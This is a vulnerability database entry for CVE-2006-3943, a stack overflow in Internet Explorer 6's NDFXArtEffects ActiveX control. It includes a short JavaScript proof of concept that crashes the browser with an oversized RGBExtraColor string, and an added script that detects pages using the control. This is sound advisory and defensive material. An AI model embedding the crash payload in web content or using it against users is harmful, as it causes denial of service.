Microsoft Internet Explorer NDFXArtEffects Stack Overflow Vulnerability

Vulnerability ID: 1110693 | Vulnerability type: Buffer overflow
Published: 2006-07-27 | Updated: 2006-08-02
CVE ID: CVE-2006-3943 | CNNVD-ID: CNNVD-200607-521
Platform: Windows | CVSS score: 2.6
|Vulnerability source
https://www.exploit-db.com/exploits/28286
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-521
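|Vulnerability details
A stack-based buffer overflow exists in NDFXArtEffects in Microsoft Internet Explorer 6 on Windows XP SP2. Remote attackers can cause a denial of service (crash) via long (1) RGBExtraColor, (2) RGBForeColor, and (3) RGBBackColor properties.
|Vulnerability exploit (EXP)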
source: http://www.securityfocus.com/bid/19184/info

Microsoft Internet Explorer is prone to a stack-overflow vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

var b = 'XXXX';
while(b.length <=1024*1024) b+=b;
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0,i);
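
For triage of captured page content, the following added example (not part of the original advisory or of any vendor tooling) statically flags scripts that instantiate the NDFXArtEffects ProgID and assign to one of the three affected properties. The function name, the sample script and the result shape are assumptions made for illustration; static matching like this misses obfuscated or dynamically generated script.

```javascript
// Added example: static triage of script text for use of the NDFXArtEffects control.
// Matches the constructor call with either quote style and an optional ".N" version suffix.
const CTOR = "new\\s+ActiveXObject\\s*\\(\\s*(?<q>['\"])" +
  "DXImageTransform\\.Microsoft\\.NDFXArtEffects(?:\\.\\d+)?\\k<q>\\s*\\)";
// The three properties named in the advisory.
const RISKY_PROPS = ['RGBExtraColor', 'RGBForeColor', 'RGBBackColor'];

// Hypothetical helper: returns whether the control is created and which
// affected properties are assigned on variables bound to it.
function scanScript(source) {
  const findings = { instantiated: new RegExp(CTOR, 'i').test(source), assignments: [] };
  if (!findings.instantiated) return findings;

  // Collect variable names bound directly to the control: "a = new ActiveXObject(...)".
  const bindRe = new RegExp('(?<name>[A-Za-z_$][\\w$]*)\\s*=\\s*' + CTOR, 'gi');
  const names = [...source.matchAll(bindRe)].map(m => m.groups.name);

  source.split(/\r?\n/).forEach((text, idx) => {
    for (const name of names) {
      const safeName = name.replace(/[$]/g, '\\$&'); // "$" is legal in identifiers
      for (const prop of RISKY_PROPS) {
        // Case-insensitive because COM property lookup ignores case; this also
        // loosens the variable-name match, which is acceptable for triage.
        const re = new RegExp('(?:^|[^\\w$.])' + safeName + '\\s*\\.\\s*' + prop +
                              '\\s*=(?!=)', 'i');
        if (re.test(text)) {
          findings.assignments.push({ line: idx + 1, variable: name, property: prop });
        }
      }
    }
  });
  return findings;
}

// Constructed sample input (not taken from a real capture).
const SAMPLE = [
  "var fill = 'XXXX';",
  "var fx = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');",
  "fx.RGBExtraColor = fill;",
  "fx.rgbbackcolor = fill;",
  "other.RGBForeColor = fill;",
].join('\n');

console.log(JSON.stringify(scanScript(SAMPLE), null, 2));
```
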
|References

Source: XF
Name: ie-rgb-properties-dos(28046)
Link: http://xforce.iss.net/xforce/xfdb/28046
Source: BID
Name: 19184
Link: http://www.securityfocus.com/bid/19184
Source: OSVDB
Name: 27530
Link: http://www.osvdb.org/27530
Source: MISC
Link: http://browserfun.blogspot.com/2006/07/mobb-27-ndfxarteffects-rgbextracolor.html